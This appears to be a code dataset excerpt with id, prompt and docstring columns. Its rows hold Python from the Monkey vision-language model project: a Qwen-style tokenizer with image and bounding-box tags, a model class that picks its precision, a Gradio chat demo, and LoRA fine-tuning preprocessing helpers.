id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
3,769 | from argparse import ArgumentParser
from pathlib import Path
import copy
import gradio as gr
import os
import re
import secrets
import tempfile
from PIL import Image
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
import shutil
from pathlib import Path
import json
class MonkeyLMHeadModel(QWenLMHeadModel):
    """Monkey causal-LM: a MonkeyModel transformer plus an untied LM head.

    On construction, resolves the numeric precision (bf16 / fp16 / fp32) from
    the config and the device capabilities, then casts the transformer and the
    head accordingly.
    """

    _keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.rotary_emb\.inv_freq"]
    _keys_to_ignore_on_load_unexpected = [r"h\.\d+\.attn\.masked_bias"]

    def __init__(self, config):
        """Build the model.

        At most one of ``config.bf16`` / ``fp16`` / ``fp32`` may be set; when
        none is set, the best precision the device supports is auto-selected.
        """
        super().__init__(config)
        assert (
            config.bf16 + config.fp16 + config.fp32 <= 1
        ), "Only one of \"bf16\", \"fp16\", \"fp32\" can be true"

        autoset_precision = config.bf16 + config.fp16 + config.fp32 == 0
        if autoset_precision:
            # logger.warning: `Logger.warn` is a deprecated alias in stdlib logging.
            if SUPPORT_BF16:
                logger.warning(
                    "The model is automatically converting to bf16 for faster inference. "
                    "If you want to disable the automatic precision, please manually add bf16/fp16/fp32=True to \"AutoModelForCausalLM.from_pretrained\"."
                )
                config.bf16 = True
            elif SUPPORT_FP16:
                logger.warning(
                    "The model is automatically converting to fp16 for faster inference. "
                    "If you want to disable the automatic precision, please manually add bf16/fp16/fp32=True to \"AutoModelForCausalLM.from_pretrained\"."
                )
                config.fp16 = True
            else:
                config.fp32 = True

        # Warn when the requested precision is not actually supported here.
        if config.bf16 and SUPPORT_CUDA and not SUPPORT_BF16:
            # Fixed message: original said "by by passing".
            logger.warning("Your device does NOT seem to support bf16, you can switch to fp16 or fp32 by passing fp16/fp32=True in \"AutoModelForCausalLM.from_pretrained\".")
        if config.fp16 and SUPPORT_CUDA and not SUPPORT_FP16:
            logger.warning("Your device does NOT support faster inference with fp16, please switch to fp32 which is likely to be faster")
        if config.fp32:
            if SUPPORT_BF16:
                logger.warning("Your device support faster inference by passing bf16=True in \"AutoModelForCausalLM.from_pretrained\".")
            elif SUPPORT_FP16:
                logger.warning("Your device support faster inference by passing fp16=True in \"AutoModelForCausalLM.from_pretrained\".")

        self.transformer = MonkeyModel(config)
        # LM head is untied from the input embeddings (bias-free projection).
        self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)

        # Cast submodules to the resolved precision.
        if config.bf16:
            self.transformer.bfloat16()
            self.lm_head.bfloat16()
        if config.fp16:
            self.transformer.half()
            self.lm_head.half()
        self.post_init()
class QWenTokenizer(PreTrainedTokenizer):
    """QWen tokenizer.

    A tiktoken-backed BPE tokenizer extended with special vision-language
    markup tags: image URLs (``<img>...</img>``, padded to IMG_TOKEN_SPAN with
    ``<imgpad>``), referring expressions (``<ref>``), bounding boxes
    (``<box>``) and quadrilaterals (``<quad>``).
    """

    vocab_files_names = VOCAB_FILES_NAMES

    def __init__(
        self,
        vocab_file,
        errors="replace",
        image_start_tag='<img>',
        image_end_tag='</img>',
        image_pad_tag='<imgpad>',
        ref_start_tag='<ref>',
        ref_end_tag='</ref>',
        box_start_tag='<box>',
        box_end_tag='</box>',
        quad_start_tag='<quad>',
        quad_end_tag='</quad>',
        **kwargs,
    ):
        super().__init__(**kwargs)
        # Surface forms of the vision-language markup tags.
        self.image_start_tag = image_start_tag
        self.image_end_tag = image_end_tag
        self.image_pad_tag = image_pad_tag
        self.ref_start_tag = ref_start_tag
        self.ref_end_tag = ref_end_tag
        self.box_start_tag = box_start_tag
        self.box_end_tag = box_end_tag
        self.quad_start_tag = quad_start_tag
        self.quad_end_tag = quad_end_tag
        self.IMAGE_ST = (
            ref_start_tag, ref_end_tag,
            box_start_tag, box_end_tag,
            quad_start_tag, quad_end_tag,
            image_start_tag, image_end_tag,
            image_pad_tag
        )

        self.errors = errors  # how to handle errors in decoding
        self.mergeable_ranks = _load_tiktoken_bpe(vocab_file)  # type: dict[bytes, int]
        # Special-token ids are assigned contiguously after the BPE ranks.
        self.special_tokens = {
            token: index
            for index, token in enumerate(
                SPECIAL_TOKENS + self.IMAGE_ST, start=len(self.mergeable_ranks)
            )
        }
        # Cache tag ids for fast comparisons during encode/decode.
        self.img_start_id = self.special_tokens[self.image_start_tag]
        self.img_end_id = self.special_tokens[self.image_end_tag]
        self.img_pad_id = self.special_tokens[self.image_pad_tag]
        self.ref_start_id = self.special_tokens[self.ref_start_tag]
        self.ref_end_id = self.special_tokens[self.ref_end_tag]
        self.box_start_id = self.special_tokens[self.box_start_tag]
        self.box_end_id = self.special_tokens[self.box_end_tag]
        self.quad_start_id = self.special_tokens[self.quad_start_tag]
        self.quad_end_id = self.special_tokens[self.quad_end_tag]

        enc = tiktoken.Encoding(
            "Qwen",
            pat_str=PAT_STR,
            mergeable_ranks=self.mergeable_ranks,
            special_tokens=self.special_tokens,
        )
        assert (
            len(self.mergeable_ranks) + len(self.special_tokens) == enc.n_vocab
        ), f"{len(self.mergeable_ranks) + len(self.special_tokens)} != {enc.n_vocab} in encoding"

        # id -> surface form (bytes for BPE tokens, str for special tokens).
        self.decoder = {
            v: k for k, v in self.mergeable_ranks.items()
        }  # type: dict[int, bytes|str]
        self.decoder.update({v: k for k, v in self.special_tokens.items()})

        self.tokenizer = enc  # type: tiktoken.Encoding

        self.eod_id = self.tokenizer.eot_token
        self.im_start_id = self.special_tokens[IMSTART]
        self.im_end_id = self.special_tokens[IMEND]

    def __getstate__(self):
        # for pickle lovers: the tiktoken Encoding is a native object and
        # cannot be pickled, so drop it; __setstate__ rebuilds it.
        state = self.__dict__.copy()
        del state['tokenizer']
        return state

    def __setstate__(self, state):
        # tokenizer is not python native; don't pass it; rebuild it
        self.__dict__.update(state)
        enc = tiktoken.Encoding(
            "Qwen",
            pat_str=PAT_STR,
            mergeable_ranks=self.mergeable_ranks,
            special_tokens=self.special_tokens,
        )
        self.tokenizer = enc

    def __len__(self) -> int:
        # Full vocabulary size: BPE ranks + special tokens.
        return self.tokenizer.n_vocab

    def get_vocab(self) -> Dict[bytes, int]:
        """Return the mergeable BPE ranks (special tokens are not included)."""
        return self.mergeable_ranks

    def convert_tokens_to_ids(
        self, tokens: Union[bytes, str, List[Union[bytes, str]]]
    ) -> List[int]:
        """Map token surface form(s) to id(s).

        A single str/bytes token returns a single id (or None if unknown),
        despite the List[int] annotation; a sequence returns a list of ids.
        """
        ids = []
        if isinstance(tokens, (str, bytes)):
            if tokens in self.special_tokens:
                return self.special_tokens[tokens]
            else:
                return self.mergeable_ranks.get(tokens)
        for token in tokens:
            if token in self.special_tokens:
                ids.append(self.special_tokens[token])
            else:
                ids.append(self.mergeable_ranks.get(token))
        return ids

    def _add_tokens(self, new_tokens: Union[List[str], List[AddedToken]], special_tokens: bool = False) -> int:
        """Reject any token addition except re-registering the known special tags."""
        if not special_tokens and new_tokens:
            raise ValueError('Adding regular tokens is not supported')
        for token in new_tokens:
            surface_form = token.content if isinstance(token, AddedToken) else token
            if surface_form not in SPECIAL_TOKENS + self.IMAGE_ST:
                raise ValueError('Adding unknown special tokens is not supported')
        # Nothing is actually added, so the vocab grows by 0.
        return 0

    def save_vocabulary(self, save_directory: str, **kwargs) -> Tuple[str]:
        """
        Save only the vocabulary of the tokenizer (vocabulary).

        Each line is "<base64 token bytes> <rank>", the tiktoken file format.

        Returns:
            `Tuple(str)`: Paths to the files saved.
        """
        file_path = os.path.join(save_directory, "qwen.tiktoken")
        with open(file_path, "w", encoding="utf8") as w:
            for k, v in self.mergeable_ranks.items():
                line = base64.b64encode(k).decode("utf8") + " " + str(v) + "\n"
                w.write(line)
        return (file_path,)

    def tokenize(
        self,
        text: str,
        allowed_special: Union[Set, str] = "all",
        disallowed_special: Union[Collection, str] = (),
        **kwargs,
    ) -> List[Union[bytes, str]]:
        """
        Converts a string in a sequence of tokens.

        Args:
            text (`str`):
                The sequence to be encoded.
            allowed_special (`Literal["all"]` or `set`):
                The surface forms of the tokens to be encoded as special tokens in regular texts.
                Default to "all".
            disallowed_special (`Literal["all"]` or `Collection`):
                The surface forms of the tokens that should not be in regular texts and trigger errors.
                Default to an empty tuple.
            kwargs (additional keyword arguments, *optional*):
                Will be passed to the underlying model specific encode method.

        Returns:
            `List[bytes|str]`: The list of tokens.
        """
        tokens = []
        text = unicodedata.normalize("NFC", text)

        # this implementation takes a detour: text -> token id -> token surface forms
        for t in self.tokenizer.encode(
            text, allowed_special=allowed_special, disallowed_special=disallowed_special
        ):
            tokens.append(self.decoder[t])

        def _encode_imgurl(img_tokens):
            # Re-pack an <img>...</img> span: the URL bytes become single-byte
            # tokens and the span is right-padded with <imgpad> to IMG_TOKEN_SPAN.
            assert img_tokens[0] == self.image_start_tag and img_tokens[-1] == self.image_end_tag
            img_tokens = img_tokens[1:-1]
            img_url = b''.join(img_tokens)
            out_img_tokens = list(map(self.decoder.get, img_url))
            if len(out_img_tokens) > IMG_TOKEN_SPAN:
                raise ValueError("The content in {}..{} is too long".format(
                    self.image_start_tag, self.image_end_tag))
            out_img_tokens.extend([self.image_pad_tag] * (IMG_TOKEN_SPAN - len(out_img_tokens)))
            out_img_tokens = [self.image_start_tag] + out_img_tokens + [self.image_end_tag]
            return out_img_tokens

        return _replace_closed_tag(tokens, self.image_start_tag, self.image_end_tag, _encode_imgurl)

    def convert_tokens_to_string(self, tokens: List[Union[bytes, str]]) -> str:
        """
        Converts a sequence of tokens in a single string.

        Byte tokens are accumulated and decoded as UTF-8 in one go (using
        ``self.errors`` for malformed sequences); str tokens pass through.
        """
        text = ""
        temp = b""
        for t in tokens:
            if isinstance(t, str):
                if temp:
                    text += temp.decode("utf-8", errors=self.errors)
                    temp = b""
                text += t
            elif isinstance(t, bytes):
                temp += t
            else:
                raise TypeError("token should only be of type types or str")
        if temp:
            text += temp.decode("utf-8", errors=self.errors)
        return text

    # NOTE(review): HF tokenizers usually expose vocab_size as a @property;
    # here it is a plain method — confirm callers invoke it with parentheses.
    def vocab_size(self):
        return self.tokenizer.n_vocab

    def _convert_id_to_token(self, index: int) -> Union[bytes, str]:
        """Converts an id to a token, special tokens included"""
        if index in self.decoder:
            return self.decoder[index]
        raise ValueError("unknown ids")

    def _convert_token_to_id(self, token: Union[bytes, str]) -> int:
        """Converts a token to an id using the vocab, special tokens included"""
        if token in self.special_tokens:
            return self.special_tokens[token]
        if token in self.mergeable_ranks:
            return self.mergeable_ranks[token]
        raise ValueError("unknown token")

    def _tokenize(self, text: str, **kwargs):
        """
        Converts a string in a sequence of tokens (string), using the tokenizer. Split in words for word-based
        vocabulary or sub-words for sub-word-based vocabularies (BPE/SentencePieces/WordPieces).

        Do NOT take care of added tokens.
        """
        raise NotImplementedError

    def _decode(
        self,
        token_ids: Union[int, List[int]],
        skip_special_tokens: bool = False,
        errors: str = None,
        **kwargs,
    ) -> str:
        """Decode ids to text, first restoring <img> URL spans from their
        byte-id + <imgpad> padded form."""
        if isinstance(token_ids, int):
            token_ids = [token_ids]

        def _decode_imgurl(img_token_ids):
            # Inverse of _encode_imgurl: strip padding, rebuild the URL bytes,
            # then re-encode the URL as regular BPE ids.
            assert img_token_ids[0] == self.img_start_id and img_token_ids[-1] == self.img_end_id
            img_token_ids = img_token_ids[1:-1]
            img_token_ids = img_token_ids[ : img_token_ids.index(self.img_pad_id)]
            img_url = bytes(img_token_ids).decode('utf-8')
            return [self.img_start_id] + self.tokenizer.encode(img_url) + [self.img_end_id]

        token_ids = _replace_closed_tag(token_ids, self.img_start_id, self.img_end_id, _decode_imgurl)

        if skip_special_tokens:
            # Special ids all sit at/above eod_id, so this drops every special token.
            token_ids = [i for i in token_ids if i < self.eod_id]
        return self.tokenizer.decode(token_ids, errors=errors or self.errors)

    def to_list_format(self, text: str):
        """Split markup text into a list of {'text'|'image'|'ref'|'box'|'quad': value} dicts."""
        text = unicodedata.normalize("NFC", text)
        token_ids = self.tokenizer.encode(
            text, allowed_special=set(self.IMAGE_ST + (ENDOFTEXT,)))

        def _encode_vl_info(tokens):
            # Classify a span by its enclosing tag pair; untagged spans become text.
            if len(tokens) == 0:
                return []
            if tokens[0] == self.img_start_id and tokens[-1] == self.img_end_id:
                key = 'image'
            elif tokens[0] == self.ref_start_id and tokens[-1] == self.ref_end_id:
                key = 'ref'
            elif tokens[0] == self.box_start_id and tokens[-1] == self.box_end_id:
                key = 'box'
            elif tokens[0] == self.quad_start_id and tokens[-1] == self.quad_end_id:
                key = 'quad'
            else:
                _tobytes = lambda x: x.encode('utf-8') if isinstance(x, str) else x
                return [{'text': b''.join(map(_tobytes, map(self.decoder.get, tokens))).decode('utf-8')}]
            _tobytes = lambda x: x.encode('utf-8') if isinstance(x, str) else x
            val = b''.join(map(_tobytes, map(self.decoder.get, tokens[1:-1]))).decode('utf-8')
            return [{key: val}]

        # Passed twice — presumably once for tagged spans and once for the text
        # between them; confirm against _replace_closed_tag's signature.
        return _replace_closed_tag(
            token_ids,
            (self.img_start_id, self.ref_start_id, self.box_start_id, self.quad_start_id),
            (self.img_end_id, self.ref_end_id, self.box_end_id, self.quad_end_id),
            _encode_vl_info,
            _encode_vl_info,
        )

    def from_list_format(self, list_format: List[Dict]):
        """Inverse of to_list_format: render element dicts back into tagged text."""
        text = ''
        num_images = 0
        for ele in list_format:
            if 'image' in ele:
                num_images += 1
                text += f'Picture {num_images}:'
                text += self.image_start_tag + ele['image'] + self.image_end_tag
                text += '\n'
            elif 'text' in ele:
                text += ele['text']
            elif 'box' in ele:
                # An optional 'ref' phrase precedes its box list.
                if 'ref' in ele:
                    text += self.ref_start_tag + ele['ref'] + self.ref_end_tag
                for box in ele['box']:
                    text += self.box_start_tag + '(%d,%d),(%d,%d)' % (box[0], box[1], box[2], box[3]) + self.box_end_tag
            else:
                raise ValueError("Unsupport element: " + str(ele))
        return text

    def _fetch_latest_picture(self, response, history):
        """Return the most recent image path/URL in (history + response), or None."""
        if history is None:
            history = []
        _history = history + [(response, None)]
        for q, r in _history[::-1]:
            for ele in self.to_list_format(q)[::-1]:
                if 'image' in ele:
                    return ele['image']
        return None

    def _fetch_all_box_with_ref(self, text):
        """Extract every box in `text` as {'box': (x1,y1,x2,y2)}, attaching the
        'ref' phrase that immediately precedes it, when present."""
        list_format = self.to_list_format(text)
        output = []
        for i, ele in enumerate(list_format):
            if 'box' in ele:
                bbox = tuple(map(int, ele['box'].replace('(', '').replace(')', '').split(',')))
                assert len(bbox) == 4
                output.append({'box': bbox})
                if i > 0 and 'ref' in list_format[i-1]:
                    output[-1]['ref'] = list_format[i-1]['ref'].strip()
        return output

    def draw_bbox_on_latest_picture(
        self,
        response,
        history=None,
    ) -> Optional[Image.Image]:
        """Draw the boxes (and ref labels) found in `response` onto the latest
        picture in the conversation; returns None when there is no picture or
        no box. Box coordinates are interpreted on a 0-1000 normalized grid."""
        image = self._fetch_latest_picture(response, history)
        if image is None:
            return None
        if image.startswith("http://") or image.startswith("https://"):
            image = Image.open(requests.get(image, stream=True).raw).convert("RGB")
            h, w = image.height, image.width
        else:
            image = np.asarray(Image.open(image).convert("RGB"))
            h, w = image.shape[0], image.shape[1]
        visualizer = Visualizer(image)

        boxes = self._fetch_all_box_with_ref(response)
        if not boxes:
            return None
        color = random.choice([_ for _ in mcolors.TABLEAU_COLORS.keys()])  # init color
        for box in boxes:
            if 'ref' in box:  # random new color for new refexps
                color = random.choice([_ for _ in mcolors.TABLEAU_COLORS.keys()])
            x1, y1, x2, y2 = box['box']
            # Rescale from the 0-1000 normalized grid to pixel coordinates.
            x1, y1, x2, y2 = (int(x1 / 1000 * w), int(y1 / 1000 * h), int(x2 / 1000 * w), int(y2 / 1000 * h))
            visualizer.draw_box((x1, y1, x2, y2), alpha=1, edge_color=color)
            if 'ref' in box:
                visualizer.draw_text(box['ref'], (x1, y1), color=color, horizontal_alignment="left")
        return visualizer.output
def _load_model_tokenizer(args):
    """Load the Monkey checkpoint and its Qwen tokenizer.

    Places the model on CPU or CUDA according to ``args.cpu_only`` and puts
    it in eval mode; the tokenizer is configured for left padding with the
    EOD token so batched prompts stay right-aligned for generation.
    """
    tokenizer = QWenTokenizer.from_pretrained(
        args.checkpoint_path, trust_remote_code=True)

    target_device = "cpu" if args.cpu_only else "cuda"

    model = MonkeyLMHeadModel.from_pretrained(
        args.checkpoint_path,
        device_map=target_device,
        trust_remote_code=True,
    ).eval()

    tokenizer.padding_side = 'left'
    tokenizer.pad_token_id = tokenizer.eod_id

    return model, tokenizer
3,770 | from argparse import ArgumentParser
from pathlib import Path
import copy
import gradio as gr
import os
import re
import secrets
import tempfile
from PIL import Image
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
import shutil
from pathlib import Path
import json
PUNCTUATION = "!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟…‧﹏."
title_markdown = ("""
# Welcome to Monkey
Hello! I'm Monkey, a Large Language and Vision Assistant. Before talking to me, please read the **Operation Guide** and **Terms of Use**.
你好!我是Monkey,一个大型语言和视觉助理。在与我交谈之前,请阅读**操作指南**和**使用条款**。
## Operation Guide 操作指南
Click the **Upload** button to upload an image. Then, you can get Monkey's answer in two ways:点击**Upload**上传图像。你可以通过两种方式得到Monkey的回答:
- Click the **Generate** and Monkey will generate a description of the image. 点击**Generate**,Monkey将生成图像的描述。
- Enter the question in the dialog box, click the **Submit**, and Monkey will answer the question based on the image. 在对话框中输入问题,点击**Submit**,Monkey会根据图片回答问题。
- Click **Clear History** to clear the current image and Q&A content.点击**Clear History**,清除当前图片和问答内容。
> Note: Monkey does not have a multi-round dialogue function. Perhaps we will further develop its capabilities in the future. 注意:Monkey没有多轮对话功能,或许我们在未来会进一步开发它的能力。
> Monkey支持中文,但使用英文提问会比使用中文效果明显好.""")
policy_markdown = ("""
## Terms of Use
By using this service, users are required to agree to the following terms:
- Monkey is for research use only and unauthorized commercial use is prohibited. For any query, please contact the author.
- Monkey's generation capabilities are limited, so we recommend that users do not rely entirely on its answers.
- Monkey's security measures are limited, so we cannot guarantee that the output is completely appropriate. We strongly recommend that users do not intentionally guide Monkey to generate harmful content, including hate speech, discrimination, violence, pornography, deception, etc.
""")
def _parse_text(text):
def _launch_demo(args, model, tokenizer):
    """Build and launch the Gradio chat demo for Monkey.

    Wires four actions to the UI: Submit (answer a question about the
    uploaded image), Generate (detailed English caption), Upload (set the
    image, resetting history) and Clear History.
    """

    def predict(_chatbot, task_history):
        """Answer the latest user question about the uploaded image (greedy decoding)."""
        chat_query = _chatbot[-1][0]
        query = task_history[-1][0]
        question = _parse_text(query)
        print("User: " + _parse_text(query))
        full_response = ""
        try:
            # First chatbot entry holds the uploaded file tuple; this raises
            # when no image has been uploaded yet.
            # BUGFIX: the image lookup is now inside the try (matching
            # `caption`) and the bare `except:` is narrowed to Exception so
            # KeyboardInterrupt/SystemExit are not swallowed.
            img_path = _chatbot[0][0][0]
            Image.open(img_path)
        except Exception:
            response = "Please upload a picture."
            _chatbot[-1] = (_parse_text(chat_query), response)
            full_response = _parse_text(response)
            task_history[-1] = (query, full_response)
            print("Monkey: " + _parse_text(full_response))
            return _chatbot
        query = f'<img>{img_path}</img> {question} Answer: '
        print(query)
        encoded = tokenizer(query, return_tensors='pt', padding='longest')
        attention_mask = encoded.attention_mask
        input_ids = encoded.input_ids
        pred = model.generate(
            input_ids=input_ids.cuda(),
            attention_mask=attention_mask.cuda(),
            do_sample=False,
            num_beams=1,
            max_new_tokens=512,
            min_new_tokens=1,
            length_penalty=3,
            num_return_sequences=1,
            output_hidden_states=True,
            use_cache=True,
            pad_token_id=tokenizer.eod_id,
            eos_token_id=tokenizer.eod_id,
        )
        # Drop the prompt tokens; decode only the newly generated tail.
        response = tokenizer.decode(pred[0][input_ids.size(1):].cpu(), skip_special_tokens=True).strip()
        _chatbot[-1] = (_parse_text(chat_query), response)
        full_response = _parse_text(response)
        task_history[-1] = (query, full_response)
        print("Monkey: " + _parse_text(full_response))
        return _chatbot

    def caption(_chatbot, task_history):
        """Generate a detailed English caption for the uploaded image (sampled decoding)."""
        query = "Generate the detailed caption in English:"
        chat_query = "Generate the detailed caption in English:"
        question = _parse_text(query)
        print("User: " + _parse_text(query))
        full_response = ""
        try:
            img_path = _chatbot[0][0][0]
            Image.open(img_path)
        except Exception:
            # BUGFIX: was a bare `except:`.
            response = "Please upload a picture."
            _chatbot.append((None, response))
            full_response = _parse_text(response)
            task_history.append((None, full_response))
            print("Monkey: " + _parse_text(full_response))
            return _chatbot
        img_path = _chatbot[0][0][0]
        query = f'<img>{img_path}</img> {chat_query} '
        print(query)
        encoded = tokenizer(query, return_tensors='pt', padding='longest')
        attention_mask = encoded.attention_mask
        input_ids = encoded.input_ids
        pred = model.generate(
            input_ids=input_ids.cuda(),
            attention_mask=attention_mask.cuda(),
            do_sample=True,
            temperature=0.7,
            max_new_tokens=250,
            min_new_tokens=1,
            length_penalty=3,
            num_return_sequences=1,
            output_hidden_states=True,
            use_cache=True,
            pad_token_id=tokenizer.eod_id,
            eos_token_id=tokenizer.eod_id,
        )
        response = tokenizer.decode(pred[0][input_ids.size(1):].cpu(), skip_special_tokens=True).strip()
        _chatbot.append((None, response))
        full_response = _parse_text(response)
        task_history.append((None, full_response))
        print("Monkey: " + _parse_text(full_response))
        return _chatbot

    def add_text(history, task_history, text):
        """Append the typed question to both histories, stripping one trailing
        punctuation mark from the task-history copy."""
        task_text = text
        if len(text) >= 2 and text[-1] in PUNCTUATION and text[-2] not in PUNCTUATION:
            task_text = text[:-1]
        history = history + [(_parse_text(text), None)]
        task_history = task_history + [(task_text, None)]
        print(history, task_history, text)
        return history, task_history, ""

    def add_file(history, task_history, file):
        """Replace both histories with the newly uploaded image (single-image demo)."""
        history = [((file.name,), None)]
        task_history = [((file.name,), None)]
        print(history, task_history, file)
        return history, task_history

    def reset_user_input():
        """Clear the input textbox."""
        return gr.update(value="")

    def reset_state(task_history):
        """Clear the task history and empty the chatbot widget."""
        task_history.clear()
        return []

    with gr.Blocks() as demo:
        gr.Markdown(title_markdown)

        chatbot = gr.Chatbot(label='Monkey', elem_classes="control-height", height=600, avatar_images=("https://ooo.0x0.ooo/2023/11/09/OehsLx.png", "https://ooo.0x0.ooo/2023/11/09/OehGBC.png"), layout="bubble", bubble_full_width=False, show_copy_button=True)
        query = gr.Textbox(lines=1, label='Input')
        task_history = gr.State([])

        with gr.Row():
            empty_bin = gr.Button("Clear History (清空)")
            submit_btn = gr.Button("Submit (提问)")
            generate_btn_en = gr.Button("Generate")
            addfile_btn = gr.UploadButton("Upload (上传图片)", file_types=["image"])

        submit_btn.click(add_text, [chatbot, task_history, query], [chatbot, task_history]).then(
            predict, [chatbot, task_history], [chatbot], show_progress=True
        )
        generate_btn_en.click(caption, [chatbot, task_history], [chatbot], show_progress=True)
        submit_btn.click(reset_user_input, [], [query])
        empty_bin.click(reset_state, [task_history], [chatbot], show_progress=True)
        addfile_btn.upload(add_file, [chatbot, task_history, addfile_btn], [chatbot, task_history], show_progress=True, scroll_to_output=True)

        gr.Markdown(policy_markdown)

    demo.queue().launch(
        server_name="0.0.0.0",
        server_port=7681
    )
3,771 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
def maybe_zero_3(param):
    """Return a detached CPU clone of ``param``.

    When the parameter is partitioned by DeepSpeed ZeRO-3 (detected via its
    ``ds_id`` attribute), it is gathered across ranks first so the full
    tensor is copied.
    """
    if not hasattr(param, "ds_id"):
        return param.detach().cpu().clone()
    # ZeRO-3 partitioned parameter: must be gathered before it can be read.
    assert param.ds_status == ZeroParamStatus.NOT_AVAILABLE
    with zero.GatheredParameters([param]):
        gathered = param.data.detach().cpu().clone()
    return gathered
import numpy as np
import random
def get_peft_state_maybe_zero_3(named_params, bias):
    """Collect the LoRA state dict (CPU copies) from named parameters.

    Args:
        named_params: iterable of (name, tensor) pairs, e.g. model.named_parameters().
        bias: "none" (LoRA weights only), "all" (LoRA weights + every bias),
              or "lora_only" (LoRA weights + the biases of LoRA-adapted modules).

    Returns:
        dict mapping parameter name to a detached CPU clone (gathered from
        ZeRO-3 shards when necessary via maybe_zero_3).

    Raises:
        NotImplementedError: for any other `bias` value.
    """
    if bias == "none":
        to_return = {k: t for k, t in named_params if "lora_" in k}
    elif bias == "all":
        to_return = {k: t for k, t in named_params if "lora_" in k or "bias" in k}
    elif bias == "lora_only":
        to_return = {}
        maybe_lora_bias = {}
        lora_bias_names = set()
        for k, t in named_params:
            if "lora_" in k:
                to_return[k] = t
                # The matching bias lives under the same module prefix.
                bias_name = k.split("lora_")[0] + "bias"
                lora_bias_names.add(bias_name)
            elif "bias" in k:
                maybe_lora_bias[k] = t
        # BUGFIX: the original iterated the dict without .items() (unpack
        # error) and tested the stale `bias_name` from the previous loop
        # instead of the current key.
        for k, t in maybe_lora_bias.items():
            if k in lora_bias_names:
                to_return[k] = t
    else:
        raise NotImplementedError
    to_return = {k: maybe_zero_3(v) for k, v in to_return.items()}
    return to_return
3,772 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
# Label value ignored by the loss (Hugging Face LabelSmoother convention).
IGNORE_TOKEN_ID = LabelSmoother.ignore_index
def format_tokenizer(tokenizer, message, return_target=False, label=False):
    """Tokenize ``message``; optionally also build its training target.

    When ``return_target`` is set, a (input_ids, target) pair is returned:
    the target equals the token ids when ``label`` is true, otherwise it is a
    same-length run of IGNORE_TOKEN_ID so the span is masked out of the loss.
    """
    input_ids = tokenizer(message).input_ids
    if not return_target:
        return input_ids
    target = input_ids if label else [IGNORE_TOKEN_ID] * len(input_ids)
    return input_ids, target
import numpy as np
import random
def preprocess(
    source,
    tokenizer,
    max_len,
    system_message: str = "You are a helpful assistant.",
    padding=True
):
    """Tokenize one (user, assistant) conversation pair into training tensors.

    Args:
        source: two-element sequence of {'value': str} dicts, user then assistant.
        tokenizer: tokenizer exposing ``pad_token_id``; tokenization is
            delegated to ``format_tokenizer``.
        max_len: length to pad/truncate both sequences to.
        system_message: unused here; kept for interface compatibility.
        padding: when True, right-pad input_ids/targets to ``max_len``.

    Returns:
        dict of int tensors ``input_ids``/``labels`` and bool ``attention_mask``.
    """
    # Apply prompt templates
    input_ids, targets = [], []
    user, assistant = source[0], source[1]
    user_input = user['value']
    assistant_input = assistant['value']
    message_l = [user_input, assistant_input]
    for i, message in enumerate(message_l):
        # Only the final (assistant) turn gets real labels; earlier turns are
        # masked with IGNORE_TOKEN_ID.  Note: some texts contain a literal
        # <img> tag, so using <img> as a special id is fragile — unbalanced
        # tags raise during tokenization and such samples are skipped.
        try:
            _input_ids, _target = format_tokenizer(tokenizer, message, return_target=True, label=True if i == len(message_l) - 1 else False)
        except Exception as e:
            print(e)
            continue
        input_ids += _input_ids
        targets += _target
        # BUGFIX: original asserted len(_input_ids) == len(_input_ids),
        # which is always true; compare input against its target instead.
        assert len(_input_ids) == len(_target)
    if padding:
        # The -1 sentinel marks the first pad slot: it is != pad_token_id
        # when the attention mask is built below (so it stays attended and
        # its label is the pad/EOD token), then it is overwritten with
        # pad_token_id before the tensors are returned.
        input_ids += [-1] + [tokenizer.pad_token_id] * (max_len - len(input_ids) - 1)
        targets += [tokenizer.pad_token_id] + [IGNORE_TOKEN_ID] * (max_len - len(targets) - 1)
    targets = targets[:max_len]
    input_ids = input_ids[:max_len]
    input_ids = torch.tensor(input_ids, dtype=torch.int)
    targets = torch.tensor(targets, dtype=torch.int)
    attention_mask = input_ids.ne(tokenizer.pad_token_id)
    input_ids[input_ids == -1] = tokenizer.pad_token_id
    return dict(
        input_ids=input_ids,
        labels=targets,
        attention_mask=attention_mask,
    )
3,773 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
class ModelArguments:
class DataArguments:
class TrainingArguments(transformers.TrainingArguments):
class LoraArguments:
local_rank = None
def rank0_print(*args):
